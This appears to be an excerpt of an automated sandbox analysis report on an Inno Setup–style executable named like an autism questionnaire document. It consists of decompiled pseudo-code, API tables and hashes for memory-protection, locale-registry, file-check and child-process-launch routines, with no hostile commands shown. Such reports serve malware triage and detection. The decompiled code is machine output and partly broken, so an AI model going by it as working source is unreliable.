						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}













                                                                                              0x004af920
                                                                                              0x004af923
                                                                                              0x004af926
                                                                                              0x004af92f
                                                                                              0x004af93b
                                                                                              0x004af942
                                                                                              0x004af9ee
                                                                                              0x004af9ee
                                                                                              0x004af948
                                                                                              0x004af9db
                                                                                              0x004af9db
                                                                                              0x004af9e1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004af954
                                                                                              0x004af9c7
                                                                                              0x004af9d2
                                                                                              0x004af9d9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004af95c
                                                                                              0x004af95c
                                                                                              0x004af961
                                                                                              0x004af967
                                                                                              0x004af986
                                                                                              0x004af98d
                                                                                              0x004af98f
                                                                                              0x004af98f
                                                                                              0x004af98d
                                                                                              0x004af994
                                                                                              0x004af9a5
                                                                                              0x004af99c
                                                                                              0x004af9a1
                                                                                              0x004af9a1
                                                                                              0x004af9af
                                                                                              0x004af9c2
                                                                                              0x004af9c2
                                                                                              0x00000000
                                                                                              0x004af9af
                                                                                              0x004af954
                                                                                              0x00000000
                                                                                              0x004af9db

                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                                                              • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                                                              • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2441996862-0
                                                                                              • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                              • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                                                              • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                              • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 73%
                                                                                              			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}













                                                                                              0x0040b04a
                                                                                              0x0040b04d
                                                                                              0x0040b050
                                                                                              0x0040b053
                                                                                              0x0040b055
                                                                                              0x0040b05b
                                                                                              0x0040b062
                                                                                              0x0040b063
                                                                                              0x0040b068
                                                                                              0x0040b06b
                                                                                              0x0040b070
                                                                                              0x0040b076
                                                                                              0x0040b07f
                                                                                              0x0040b08f
                                                                                              0x0040b09c
                                                                                              0x0040b0a3
                                                                                              0x0040b0aa
                                                                                              0x0040b0ac
                                                                                              0x0040b0bd
                                                                                              0x0040b0ca
                                                                                              0x0040b0d1
                                                                                              0x0040b0d8
                                                                                              0x0040b0dc
                                                                                              0x0040b0dc
                                                                                              0x0040b0d8
                                                                                              0x0040b0e3
                                                                                              0x0040b0e6
                                                                                              0x0040b0e9
                                                                                              0x0040b0f6
                                                                                              0x0040b103

                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                                                                • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                                • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                              • String ID:
                                                                                              • API String ID: 3216391948-0
                                                                                              • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                              • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                                                              • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                              • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 46%
                                                                                              			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}








                                                                                              0x0040aefd
                                                                                              0x0040aefe
                                                                                              0x0040af04
                                                                                              0x0040af0b
                                                                                              0x0040af0c
                                                                                              0x0040af11
                                                                                              0x0040af14
                                                                                              0x0040af27
                                                                                              0x0040af34
                                                                                              0x0040af37
                                                                                              0x0040af37
                                                                                              0x0040af3e
                                                                                              0x0040af41
                                                                                              0x0040af44
                                                                                              0x0040af51

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                              • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                                                              • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                              • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 78%
                                                                                              			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                                              0x0040ab19
                                                                                              0x0040ab1b
                                                                                              0x0040ab22
                                                                                              0x0040ab24
                                                                                              0x0040ab2a
                                                                                              0x0040ab31
                                                                                              0x0040ab32
                                                                                              0x0040ab37
                                                                                              0x0040ab3a
                                                                                              0x0040ab41
                                                                                              0x0040ab6d
                                                                                              0x0040ab43
                                                                                              0x0040ab51
                                                                                              0x0040ab51
                                                                                              0x0040ab7a
                                                                                              0x0040ad27
                                                                                              0x0040ad29
                                                                                              0x0040ad2c
                                                                                              0x0040ad2f
                                                                                              0x0040ad3c
                                                                                              0x0040ab80
                                                                                              0x0040ab82
                                                                                              0x0040ab9a
                                                                                              0x0040aba1
                                                                                              0x0040ac41
                                                                                              0x0040ac43
                                                                                              0x0040ac44
                                                                                              0x0040ac49
                                                                                              0x0040ac4c
                                                                                              0x0040ac5a
                                                                                              0x0040ac7b
                                                                                              0x0040acca
                                                                                              0x0040acd4
                                                                                              0x0040acec
                                                                                              0x0040acf6
                                                                                              0x0040acf6
                                                                                              0x0040ac7d
                                                                                              0x0040ac85
                                                                                              0x0040ac9f
                                                                                              0x0040aca9
                                                                                              0x0040aca9
                                                                                              0x0040acfd
                                                                                              0x0040ad00
                                                                                              0x0040ad03
                                                                                              0x0040ad0c
                                                                                              0x0040ad11
                                                                                              0x0040ad11
                                                                                              0x0040ad1f
                                                                                              0x0040aba7
                                                                                              0x0040abbc
                                                                                              0x0040abc3
                                                                                              0x00000000
                                                                                              0x0040abc5
                                                                                              0x0040abda
                                                                                              0x0040abe1
                                                                                              0x00000000
                                                                                              0x0040abe3
                                                                                              0x0040abf8
                                                                                              0x0040abff
                                                                                              0x00000000
                                                                                              0x0040ac01
                                                                                              0x0040ac16
                                                                                              0x0040ac1d
                                                                                              0x00000000
                                                                                              0x0040ac1f
                                                                                              0x0040ac34
                                                                                              0x0040ac3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ac3b
                                                                                              0x0040ac1d
                                                                                              0x0040abff
                                                                                              0x0040abe1
                                                                                              0x0040abc3
                                                                                              0x0040aba1

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                                                              • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                              • API String ID: 2701450724-3496071916
                                                                                              • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                              • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                                                              • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                              • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 85%
                                                                                              			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x1d025e
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x1d025e
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4d582c
				_t4 = _t26 + 0x20; // 0x61e129d
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4d582c
				_t7 = _t28 + 0x24; // 0xc9800
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x1d025e
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}
























                                                                                              0x004b63a1
                                                                                              0x004b63a1
                                                                                              0x004b63a1
                                                                                              0x004b63a1
                                                                                              0x004b63a3
                                                                                              0x004b63a6
                                                                                              0x004b63d3
                                                                                              0x004b63da
                                                                                              0x004b63e0
                                                                                              0x004b6407
                                                                                              0x004b640c
                                                                                              0x004b6418
                                                                                              0x004b6423
                                                                                              0x004b642c
                                                                                              0x004b6431
                                                                                              0x004b6434
                                                                                              0x004b6438
                                                                                              0x004b643d
                                                                                              0x004b6440
                                                                                              0x004b6443
                                                                                              0x004b6447
                                                                                              0x004b644c
                                                                                              0x004b644f
                                                                                              0x004b6452
                                                                                              0x004b6463
                                                                                              0x004b6468
                                                                                              0x004b646b
                                                                                              0x004b6471
                                                                                              0x004b6479
                                                                                              0x004b647e
                                                                                              0x004b6489
                                                                                              0x004b6496
                                                                                              0x004b649b
                                                                                              0x004b64a7
                                                                                              0x004b64a9
                                                                                              0x004b64ae
                                                                                              0x004b64ae
                                                                                              0x004b64b5
                                                                                              0x004b64b8
                                                                                              0x004b64bb
                                                                                              0x004b64c0
                                                                                              0x004b64c5
                                                                                              0x004b64d1
                                                                                              0x004b64df
                                                                                              0x004b64e7
                                                                                              0x004b64e7
                                                                                              0x004b64f3
                                                                                              0x004b64f5
                                                                                              0x004b6500
                                                                                              0x004b6500
                                                                                              0x004b650c
                                                                                              0x004b650e
                                                                                              0x004b6514
                                                                                              0x004b6514
                                                                                              0x004b6520
                                                                                              0x004b6522
                                                                                              0x004b6527
                                                                                              0x004b652d
                                                                                              0x004b6533
                                                                                              0x004b6538
                                                                                              0x004b653d
                                                                                              0x004b6544
                                                                                              0x00000000
                                                                                              0x004b6544
                                                                                              0x004b6549

                                                                                              APIs
                                                                                                • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                                                              • SetWindowLongW.USER32 ref: 004B641E
                                                                                                • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                                                                • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                                                                • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                                • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                                • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                                • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                              • DestroyWindow.USER32(001D025E,004B6554), ref: 004B6514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                              • String ID: ,XM$/SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                              • API String ID: 3586484885-3367169067
                                                                                              • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                              • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                                                              • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                              • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 150 40426c-40427b 151 404281-404285 150->151 152 404364-404367 150->152 153 404287-40428e 151->153 154 4042e8-4042f1 151->154 155 404454-404458 152->155 156 40436d-404377 152->156 157 404290-40429b 153->157 158 4042bc-4042be 153->158 154->153 163 4042f3-4042fc 154->163 161 403cf8-403d1d call 403c48 155->161 162 40445e-404463 155->162 159 404328-404335 156->159 160 404379-404385 156->160 166 4042a4-4042b9 157->166 167 40429d-4042a2 157->167 170 4042c0-4042d1 158->170 171 4042d3 158->171 159->160 164 404337-404340 159->164 168 404387-40438a 160->168 169 4043bc-4043ca 160->169 181 403d39-403d40 161->181 182 403d1f-403d2e VirtualFree 161->182 163->154 172 4042fe-404312 Sleep 163->172 164->159 174 404342-404356 Sleep 164->174 176 40438e-404392 168->176 169->176 178 4043cc-4043d1 call 403ac0 169->178 170->171 177 4042d6-4042e3 170->177 171->177 172->153 173 404318-404323 Sleep 172->173 173->154 174->160 180 404358-40435f Sleep 174->180 183 4043d4-4043e1 176->183 184 404394-40439a 176->184 177->156 178->176 180->159 191 403d42-403d5e VirtualQuery VirtualFree 181->191 187 403d30-403d32 182->187 188 403d34-403d37 182->188 183->184 186 4043e3-4043ea call 403ac0 183->186 189 4043ec-4043f6 184->189 190 40439c-4043ba call 403b00 184->190 186->184 195 403d73-403d75 187->195 188->195 193 404424-404451 call 403b60 189->193 194 4043f8-404420 VirtualFree 189->194 197 403d60-403d63 191->197 198 403d65-403d6b 191->198 199 403d77-403d87 195->199 200 403d8a-403d9a 195->200 197->195 198->195 204 403d6d-403d71 198->204 199->200 204->191
                                                                                              C-Code - Quality: 91%
